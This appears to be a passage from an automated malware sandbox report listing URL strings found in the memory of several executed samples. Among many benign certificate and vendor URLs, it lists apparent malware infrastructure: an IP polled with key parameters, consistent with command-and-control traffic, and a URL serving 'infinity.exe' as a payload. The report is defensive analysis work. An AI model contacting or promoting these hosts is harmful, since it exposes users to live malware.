                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                            Source: powershell.exe, 00000025.00000002.2508924501.0000018C1B1B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                            Source: AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1383159698.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1372723744.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                            Source: 179187318e.exe, 00000010.00000002.1947112777.0000000000409000.00000002.00000001.01000000.00000012.sdmp, 179187318e.exe, 00000010.00000000.1933749707.0000000000409000.00000002.00000001.01000000.00000012.sdmp, 61f0c6628c.exe, 00000027.00000000.2104251848.0000000000409000.00000002.00000001.01000000.0000001D.sdmp, 61f0c6628c.exe, 00000027.00000002.2116238186.0000000000409000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                            Source: powershell.exe, 00000025.00000002.2431434937.0000018C12F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C02F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: Avoiding.com, 0000001C.00000000.1976301364.00000000004A5000.00000002.00000001.01000000.00000014.sdmp, Macromedia.com, 00000033.00000000.2218283398.00000000004E5000.00000002.00000001.01000000.00000020.sdmp, Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                            Source: skotes.exe, 00000009.00000002.2840798279.00000000065A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2840798279.00000000065A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                            Source: infinity.exe, 0000000A.00000003.1831655760.0000000002088000.00000004.00001000.00020000.00000000.sdmp, infinity.exe, 0000000A.00000003.1831482408.0000000002380000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000002.2747593966.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, f46bdbcca4.exe, 0000001F.00000003.2049328458.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, f46bdbcca4.exe, 0000001F.00000003.2048918830.0000000002240000.00000004.00001000.00020000.00000000.sdmp, f46bdbcca4.tmp, 00000020.00000000.2050067189.0000000000401000.00000020.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.innosetup.com/
                            Source: infinity.exe, 0000000A.00000002.2747026307.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, infinity.exe.9.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                            Source: infinity.exe, 0000000A.00000002.2747026307.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, infinity.exe.9.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                            Source: infinity.exe, 0000000A.00000003.1831655760.0000000002088000.00000004.00001000.00020000.00000000.sdmp, infinity.exe, 0000000A.00000003.1831482408.0000000002380000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000002.2747593966.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, f46bdbcca4.exe, 0000001F.00000003.2049328458.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, f46bdbcca4.exe, 0000001F.00000003.2048918830.0000000002240000.00000004.00001000.00020000.00000000.sdmp, f46bdbcca4.tmp, 00000020.00000000.2050067189.0000000000401000.00000020.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.remobjects.com/ps
                            Source: infinity.exe, 0000000A.00000003.1831655760.0000000002088000.00000004.00001000.00020000.00000000.sdmp, infinity.exe, 0000000A.00000003.1831482408.0000000002380000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000002.2747593966.0000000000401000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.remobjects.com/psU
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                            Source: AApUa7VQiy.exe, 00000000.00000003.1354025761.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1956839625.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000894000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000003.2449815673.0000000003354000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332E000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000003.2439668657.000000000332C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/(4
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/C
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/F
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/M
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb386926d19fe6595cd66946951e91fcd85220
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003326000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332A000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb387926d19fe6595cd66946951e91fcd85220
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb388926d19fe6595cd66946951e91fcd85220
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb389926d19fe6595cd66946951e91fcd85220
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38a926d19fe6595cd66946951e91fcd85220
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003326000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38b926d19fe6595cd66946951e91fcd85220
                            Source: flv2aviconverter24.exe, 0000000C.00000003.2449815673.0000000003354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38c926d19fe6595cd66946851e91fcd85241
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38d926d19fe6595cd66946951e91fcd85220
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f802a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f812a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000337C000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f822a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f832a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003380000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2781846530.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f842a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f852a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f862a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f872a1cec7a86d87bdb6546ad12dac0290
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f926d19fe6595cd66946851e91fcd85241
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/allowedCert_OS_1
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/en-GB
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2781846530.000000000332E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ography
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2754377990.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/priseCertificates
                            Source: flv2aviconverter24.exe, 0000000C.00000003.2439668657.000000000332C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/rosoft
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000147E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000147E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/infinity.exe
                            Source: skotes.exe, 00000009.00000002.2765037077.000000000147E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/infinity.exe6
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C02F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2079280580.0000000001359000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                            Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1959045074.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
                            Source: ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                            Source: df1b740bf8.exe, 0000001E.00000002.2077168119.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057160888.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=eVGzFA1_2smb&a
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
